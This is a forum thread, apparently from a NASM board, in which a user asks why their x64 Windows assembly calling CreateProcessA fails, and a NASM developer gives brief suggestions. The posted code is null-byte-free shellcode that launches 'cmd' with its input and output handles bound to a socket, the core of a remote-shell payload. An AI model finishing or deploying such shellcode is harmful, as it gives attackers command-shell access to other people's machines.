Author Topic: createProcessA win64  (Read 609 times)

Offline Bgrim

  • New Member
  • Posts: 1
createProcessA win64
« on: November 23, 2021, 06:02:53 AM »
Hi.

I need help with CreateProcessA, it doesn't work and I don't know why...

I did this code first, but it doesn't work, someone explained me that maybe the parameters are corrupting ProcessInfo.

Code: [Select]
mov r13, rdx  ;CreateProcessA

xor rdx, rdx
xor r15, r15
mov edx, 0x646d6361
shr edx, 8
push rdx
mov r15, rsp    ;cmd

xor rdx, rdx
push rdi  ;socket
push rdi  ;socket
push rdi  ;socket
push rdx
push rdx
xor rax, rax
inc rax
rol rax, 8
push rax    ;0x00000100
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
push rdx
xor rax, rax
add al, 44
push rax
xor r14, r14
mov r14, rsp ;STARTUPINFOA

xor r12, r12
sub rsp, 0x16
mov r12, rsp  ;ProcessInfo

sub rsp, 0x58 ;shadowspace

mov [rsp+72], r12 ;ProcessInfo
mov [rsp+64], r14 ;STARTUPINFOA
mov [rsp+56], rdx
mov [rsp+48], rdx
mov [rsp+40], rdx
xor rax, rax
inc rax
mov [rsp+32], rax
xor r8, r8
xor r9, r9
mov rdx, r15  ;cmd
xor rcx, rcx

call r13

well, so I change the code and I did this.

Code: [Select]
mov r13, rdx ;CreateProcessA

xor rdx, rdx
xor r15, r15
mov edx, 0x646d6361
shr edx, 8
push rdx
mov r15, rsp    ;cmd

xor r12, r12
xor rcx, rcx
xor rdx, rdx
mov rcx, 0x80

lop_nul:
push rdx
loop lop_nul  ;space for STARTUPINFOA and ProcessInfo

xor rax, rax
mov al, 0x68

lea r12, [rsp]
mov [r12], dword eax
mov [r12+4], rcx
mov [r12+12], rcx
mov [r12+20], rcx
mov [r12+24], rcx

xor rdx, rdx
mov dl, 255
inc rdx

mov [r12+0x3c], edx ;0x00000100
mov [r12+0x50], rdi ;socket
mov [r12+0x58], rdi ;socket
mov [r12+0x60], rdi ;socket


xor rdx, rdx

sub rsp, 0x58

lea r9, [r12]
mov [rsp+64], r9
lea r9, [r12+104]
mov [rsp+72], r9
mov [rsp+56], rdx
mov [rsp+48], rdx
mov [rsp+40], rdx
xor rax, rax
inc rax
mov [rsp+32], rax
xor r8, r8
xor r9, r9
mov rdx, r15  ;cmd
xor rcx, rcx

call r13

With a source code on C++ using CreateProcess and debugging the code I don't see the real problem.

So, can somebody help me with this please?.

Offline Frank Kotler

  • NASM Developer
  • Hero Member
  • *****
  • Posts: 2505
  • Country: us
Re: createProcessA win64
« Reply #1 on: November 23, 2021, 09:46:46 PM »
Hi Bgrim,

Welcome to the Forum.

I don't "do Windows". What I see missing is:
Code: [Select]
extern CreateProcessA
Probably want ExitProcess, too.
"shr edx, 8" looks suspicious, too.

Hope a Windows user can help you!

Best,
Frank